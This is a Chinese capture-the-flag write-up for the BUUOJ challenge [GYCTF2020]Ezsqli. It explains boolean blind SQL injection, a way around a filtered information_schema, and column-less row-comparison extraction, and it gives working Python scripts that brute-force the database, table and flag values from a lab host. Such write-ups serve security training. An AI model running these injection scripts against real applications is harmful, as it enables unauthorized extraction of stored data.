🤤
BUUOJwp
  • README
  • SQL注入
    • [BSidesCF 2019]Sequel
    • [RCTF2015]EasySQL
    • [RootersCTF2019]babyWeb
    • [SUCTF 2018]MultiSQL
    • October 2019 Twice SQL Injection
    • [Black Watch 入群题]Web
    • [网鼎杯2018]Unfinish
    • [NCTF2019]SQLi
    • [CISCN2019 华北赛区 Day1 Web5]CyberPunk
    • [WUSTCTF2020]颜值成绩查询
    • [强网杯 2019]随便注
    • [b01lers2020]Life on Mars
    • [CISCN2019 华北赛区 Day2 Web1]Hack World
    • [SUCTF 2019]EasySQL
    • [GXYCTF2019]BabySQli
    • [GYCTF2020]Ezsqli
    • [极客大挑战 2019]EasySQL
    • [极客大挑战 2019]LoveSQL
    • [极客大挑战 2019]BabySQL
    • [极客大挑战 2019]HardSQL
    • [极客大挑战 2019]FinalSQL
    • [RoarCTF 2019]Online Proxy
    • [BJDCTF2020]Easy MD5
    • [BJDCTF 2nd]简单注入
    • [网鼎杯 2018]Comment
    • [SWPU2019]Web1
    • [GYCTF2020]Blacklist
    • [SWPU2019]Web4
    • [HarekazeCTF2019]Sqlite Voting
    • [XDCTF 2015]filemanager
    • [FBCTF2019]Products Manager
    • [PwnThyBytes 2019]Baby_SQL
    • [Zer0pts2020]phpNantokaAdmin
    • [NPUCTF2020]ezlogin
  • 命令执行/代码执行
    • [De1CTF 2019]Giftbox
    • Wallbreaker_Easy
    • [GXYCTF2019]禁止套娃
    • [CISCN 2019 初赛]Love Math
    • [NESTCTF 2019]Love Math 2
    • [ISITDTU 2019]EasyPHP
    • [红明谷CTF 2021]write_shell
    • 未完成[RoarCTF 2019]Easy Calc
    • [极客大挑战 2019]RCE ME
    • EasyBypass
    • [FBCTF2019]RCEService
    • [ACTF2020 新生赛]Exec
    • [HITCON 2017]SSRFme
    • [GXYCTF2019]Ping Ping Ping
    • [SUCTF 2018]GetShell
  • XXE
    • [NCTF2019]Fake XML cookbook
    • [NCTF2019]True XML cookbook
    • [CSAWQual 2019]Web_Unagi
    • [BSidesCF 2019]SVGMagic
    • [GoogleCTF2019 Quals]Bnv
  • SSRF
    • [网鼎杯 2020 玄武组]SSRFMe
  • XSS
    • [CISCN2019 华东北赛区]Web2
    • [GWCTF 2019]mypassword
  • SSTI
    • PHP
      • [CISCN2019 华东南赛区]Web11
      • [BJDCTF2020]The mystery of ip
      • [BJDCTF2020]Cookie is so stable
    • Python
      • [GWCTF 2019]你的名字
      • [pasecactf_2019]flask_ssti
      • [FBCTF2019]Event
      • [RootersCTF2019]I_<3_Flask
      • [CSCCTF 2019 Qual]FlaskLight
      • [GYCTF2020]FlaskApp
      • [WesternCTF2018]shrine
      • [护网杯 2018]easy_tornado
  • 文件上传
    • [HarekazeCTF2019]Avatar Uploader 1
    • [SUCTF 2019]CheckIn
    • [WUSTCTF2020]CV Maker
    • [MRCTF2020]你传你🐎呢
    • [GXYCTF2019]BabyUpload
    • [极客大挑战 2019]Upload
    • [ACTF2020 新生赛]Upload
    • [XNUCA2019Qualifier]EasyPHP
    • [羊城杯2020]easyphp
    • [SUCTF 2019]EasyWeb
  • PHP
    • Laravel
      • 未完成[CISCN2019 总决赛 Day1 Web4]Laravel1
    • PHP特性
      • [RCTF 2019]Nextphp
      • [WMCTF2020]Make PHP Great Again
      • [HarekazeCTF2019]encode_and_encode
      • [安洵杯 2019]easy_web
      • [Zer0pts2020]Can you guess it?
      • [WUSTCTF2020]朴实无华
      • [BJDCTF2020]Mark loves cat
      • [MRCTF2020]Ez_bypass
      • [GWCTF 2019]枯燥的抽奖
      • [MRCTF2020]Ezaudit
      • [BJDCTF2020]EzPHP
      • [NPUCTF2020]ReadlezPHP
      • [BSidesCF 2020]Had a bad day
      • [GWCTF 2019]我有一个数据库
      • [ACTF2020 新生赛]Include
      • [HCTF 2018]WarmUp
      • [SUCTF 2018]annonymous
      • [极客大挑战 2020]Roamphp1 Welcome
      • [网鼎杯 2020 半决赛]AliceWebsite
      • [ACTF2020 新生赛]BackupFile
      • [极客大挑战 2019]BuyFlag
      • [羊城杯 2020]Blackcat
      • [羊城杯 2020]Easyphp2
      • [羊城杯 2020]EasySer
    • PHP反序列化
      • [MRCTF2020]Ezpop_Revenge
      • [HarekazeCTF2019]Easy Notes
      • bestphp's revenge
      • [SUCTF 2019]Upload Labs 2
      • [SWPUCTF2018] SimplePHP
      • [CISCN2019 华北赛区 Day1 Web1]Dropbox
      • [0CTF 2016]piapiapia
      • [安洵杯 2019]easy_serialize_php
      • [GYCTF2020]Easyphp
      • [极客大挑战 2019]PHP
      • [网鼎杯 2020 青龙组]AreUSerialz
      • [BJDCTF2020]ZJCTF,不过如此
      • [EIS 2019]EzPOP
      • [2020 新春红包题]1
      • [MRCTF2020]Ezpop
      • [ZJCTF 2019]NiZhuanSiWei
    • ThinkPHP
      • [安洵杯 2019]iamthinking
      • [GYCTF2020]EasyThinking
      • [BJDCTF 2nd]old-hack
      • [RoarCTF 2019]Simple Upload
    • PHP综合
      • [网鼎杯 2020 总决赛]Game Exp
      • [HITCON 2017]Baby^h Master PHP
      • [HFCTF2020]BabyUpload
      • [NPUCTF2020]ezinclude
      • [MRCTF2020]套娃
      • [BUUCTF 2018]Online Tool
      • [网鼎杯 2020 朱雀组]Nmap
      • [网鼎杯 2020 朱雀组]phpweb
      • [网鼎杯 2018]Fakebook
      • [强网杯 2019] UPLOAD
      • [CISCN2019 总决赛 Day2 Web1]Easyweb
      • [GKCTF 2021]easycms
      • [GXYCTF2019]BabysqliV3.0
      • [N1CTF 2018]eating_cms
      • [安洵杯 2019]不是文件上传
      • [极客大挑战 2020]Greatphp
      • [极客大挑战 2020]Roamphp2-Myblog
      • [蓝帽杯 2021]One Pointer PHP
      • [BJDCTF2020]EzPHP
      • [CISCN2021 Quals]upload
  • Python
    • 逻辑漏洞
      • [DDCTF 2019]homebrew event loop
      • [CISCN2019 华北赛区 Day1 Web2]ikun
    • Flask
      • [HCTF 2018]Hideandseek
      • [SWPU2019]Web3
      • [watevrCTF-2019]Supercalc
      • [HCTF 2018]admin
      • [De1CTF 2019]SSRF Me
      • [CISCN2019 总决赛 Day1 Web3]Flask Message Board(*)
      • [CISCN2019 华东南赛区]Web4
      • [CISCN2019 华东南赛区]Double Secret
      • [网鼎杯 2020 白虎组]PicDown
      • [PASECA2019]honey_shop
      • [HFCTF 2021 Final]easyflask
    • 反序列化
      • [watevrCTF-2019]Pickle Store
  • Java
    • [网鼎杯 2020 朱雀组]Think Java
    • [NPUCTF2020]web🐕
    • [网鼎杯 2020 青龙组]filejava
    • [RoarCTF 2019]Easy Java
  • JavaScript
    • [GYCTF2020]Ez_Express
    • [网鼎杯 2020 青龙组]notes
    • [NPUCTF2020]验证🐎
    • [GYCTF2020]Node Game
    • [HITCON 2016]Leaking
    • [HFCTF2020]JustEscape
    • [FireshellCTF2020]ScreenShooter
    • [HFCTF2020]EasyLogin
  • 未分类
    • Unicode安全性
      • [SUCTF 2019]Pythonginx
      • [ASIS 2019]Unicorn shop
    • HTTP问题
      • [极客大挑战 2019]Secret File
      • [极客大挑战 2019]Http
      • [MRCTF2020]PYWebsite
      • [BSidesCF 2019]Kookie
      • [BSidesCF 2020]Hurdles
      • [watevrCTF-2019]Cookie Store
    • [b01lers2020]Space Noodles
    • [BSidesCF 2020]Cards
    • [BSidesCF 2019]Mixer
    • [BSidesCF 2019]Pick Tac Toe
    • [BSidesCF 2019]Futurella
    • [RootersCTF2019]ImgXweb
    • [CSAWQual 2016]i_got_id
    • [Windows][HITCON 2019]Buggy_Net
    • [极客大挑战 2019]Knife
    • [极客大挑战 2019]Havefun
    • [GXYCTF2019]StrongestMind
    • [b01lers2020]Welcome to Earth
    • [FireshellCTF2020]Caas
    • [BJDCTF2020]EasySearch
    • [SCTF2019]Flag Shop
    • [强网杯 2019]高明的黑客
    • virink_2019_files_share
由 GitBook 提供支持
在本页
  • [GYCTF2020]Ezsqli
  • 考点
  • wp
在GitHub上编辑
  1. SQL注入

[GYCTF2020]Ezsqli

[GYCTF2020]Ezsqli

考点

  • 布尔盲注

  • sys.schema_table_statistics_with_buffer bypass information_schema

  • 无列名注入

wp

POST 参数 id 存在数字注入,POST id=0^1 返回正常,POST id= 0^0 返回 Error POST id=0^(ascii(substr((select%20database()),1,1))>0) 返回正常

用脚本可以跑出数据库名

import requests

url = 'http://07fb8bbc-8905-4e86-aa75-150e999cc025.node3.buuoj.cn/index.php'

# 0^1返回 Nu1L
# 0^0返回 Error Occured When Fetch Result

# give_grandpa_pa_pa_pa
def get_database():
    flag = ''
    for i in range(1, 50):
        low = 32
        high = 126
        mid = (low+high)//2
        print(flag)
        
        while low < high:
            payload = f"0^(ascii(substr((select database()),{i},1))>{mid})#"
            
            data = {
                'id': payload
            }
            
            r = requests.post(url=url, data=data)
            # print(r.text)
            if 'Nu1L' in  r.text:
                low = mid + 1
            if 'Error' in r.text:
                high = mid
                
            mid = (low+high)//2
            
            if low == high:
                flag = flag + chr(low)
                break

过滤了information_schema,可以使用sys.schema_table_statistics_with_buffer获取表名 select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database()

脚本如下

# users233333333333333,f1ag_1s_h3r3_hhhhh
def get_table():
    flag = ''
    for i in range(1, 100):
        low = 32
        high = 126
        mid = (low+high)//2
        print(flag)
        
        while low < high:
            payload = f"0^(ascii(substr((select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database()),{i},1))>{mid})"
            
            data = {
                'id': payload
            }
            
            r = requests.post(url=url, data=data)
            # print(r.text)
            if 'Nu1L' in  r.text:
                low = mid + 1
            if 'Error' in r.text:
                high = mid
                
            mid = (low+high)//2
            
            if low == high:
                flag = flag + chr(low)
                break

不难猜flag在 f1ag_1s_h3r3_hhhhh 剩下的就是无列名注入 先判断一下f1ag_1s_h3r3_hhhhh有几列,但是这里过滤了 union select 和 order by MySQL官方给了一种方法,https://dev.mysql.com/doc/refman/8.0/en/row-subqueries.html

SELECT * FROM users WHERE (1) = (SELECT * FROM flag_123 LIMIT 0,1) 这个语句可以正常返回,其中 users 有 3 列,flag_123 只有 1 列,通过改变 WHERE 子句后的 1 的个数可以判断 flag_123 的列数 SELECT * FROM users WHERE (1,2) = (SELECT * FROM flag_123 LIMIT 0,1) 该语句会返回错误

回到本题,其后端查询语句不难猜到为 SELECT * FROM users WHERE id = 1 结合上面的内容可以改为 SELECT * FROM users WHERE id = 1 ^ ((1)=(select * from f1ag_1s_h3r3_hhhhh)) 如果返回错误说明不只有 1 列 实际上,1 ^ ((1,2)=(select * from f1ag_1s_h3r3_hhhhh)) 是返回正确的,说明 f1ag_1s_h3r3_hhhhh 有两列

SELECT * FROM users WHERE id = 1 ^ (('0',2)<(select * from f1ag_1s_h3r3_hhhhh)) 按照理论来说,这个应该返回 Error,实际和理论相同 SELECT * FROM users WHERE id = 1 ^ (('0',2)>(select * from f1ag_1s_h3r3_hhhhh)) 按照理论来说,这个应该返回 Nu1L,实际和理论相同

所以可以对这两个位置进行字符串的爆破来查看flag,也可以通过第一个字符进行判断 0 ^ (('g',2)>(select * from f1ag_1s_h3r3_hhhhh)) 返回 Error 说明第一列第一个字符以 f 开头 0 ^ ((1,'g')>(select * from f1ag_1s_h3r3_hhhhh)) 返回 Nu1L 0 ^ ((1,'f')>(select * from f1ag_1s_h3r3_hhhhh)) 返回 Error 说明第二列第一个字符以 f 开头

这里有个地方需要注意,在 MySQL 中 SELECT((SELECT 'G')>(SELECT 'f')) 返回 1,但是实际上 G 的ASCII小于 f 的, SELECT((SELECT 'E')>(SELECT 'f')) 返回 0,所以这里在脚本里面进行了设置编码表,并且这里无法判断大小写

import requests

url = 'http://07fb8bbc-8905-4e86-aa75-150e999cc025.node3.buuoj.cn/index.php'

# 0^1返回 Nu1L
# 0^0返回 Error Occured When Fetch Result

# give_grandpa_pa_pa_pa
def get_database():
    flag = ''
    for i in range(1, 50):
        low = 32
        high = 126
        mid = (low+high)//2
        print(flag)
        
        while low < high:
            payload = f"0^(ascii(substr((select database()),{i},1))>{mid})"
            
            data = {
                'id': payload
            }
            
            r = requests.post(url=url, data=data)
            # print(r.text)
            if 'Nu1L' in  r.text:
                low = mid + 1
            if 'Error' in r.text:
                high = mid
                
            mid = (low+high)//2
            
            if low == high:
                flag = flag + chr(low)
                break

# users233333333333333,f1ag_1s_h3r3_hhhhh
def get_table():
    flag = ''
    for i in range(1, 100):
        low = 32
        high = 126
        mid = (low+high)//2
        print(flag)
        
        while low < high:
            payload = f"0^(ascii(substr((select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database()),{i},1))>{mid})"
            
            data = {
                'id': payload
            }
            
            r = requests.post(url=url, data=data)
            # print(r.text)
            if 'Nu1L' in  r.text:
                low = mid + 1
            if 'Error' in r.text:
                high = mid
                
            mid = (low+high)//2
            
            if low == high:
                flag = flag + chr(low)
                break

def get_version():
    flag = ''
    for i in range(1, 50):
        low = 32
        high = 126
        mid = (low+high)//2
        print(flag)
        
        while low < high:
            payload = f"0^(ascii(substr((SELECT VERSION()),{i},1))>{mid})"
            
            data = {
                'id': payload
            }
            
            r = requests.post(url=url, data=data)
            # print(r.text)
            if 'Nu1L' in  r.text:
                low = mid + 1
            if 'Error' in r.text:
                high = mid
                
            mid = (low+high)//2
            
            if low == high:
                flag = flag + chr(low)
                break


def get_flag():
    table = [',','-','0','1','2','3','4','5','6','7','8','9','_','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','{','}']
    flag = ''
    for i in range(1, 100):
        low = 0
        high = 41
        mid = (low+high)//2
        print(flag)
        
        while low < high:
            single_char = table[mid]
            
            tmp = flag + single_char
            
            payload = f"0 ^ ((1,'{tmp}')>(select * from f1ag_1s_h3r3_hhhhh))"
            data = {
                'id': payload
            }
            
            r = requests.post(url=url, data=data)
            # print(r.text)
            if 'Error' in  r.text:
                low = mid + 1
            if 'Nu1L' in r.text:
                high = mid
   
            mid = (low+high)//2

            
            if low == high:
                flag = flag + table[mid-1]
                break
get_flag()
上一页[GXYCTF2019]BabySQli下一页[极客大挑战 2019]EasySQL

最后更新于3年前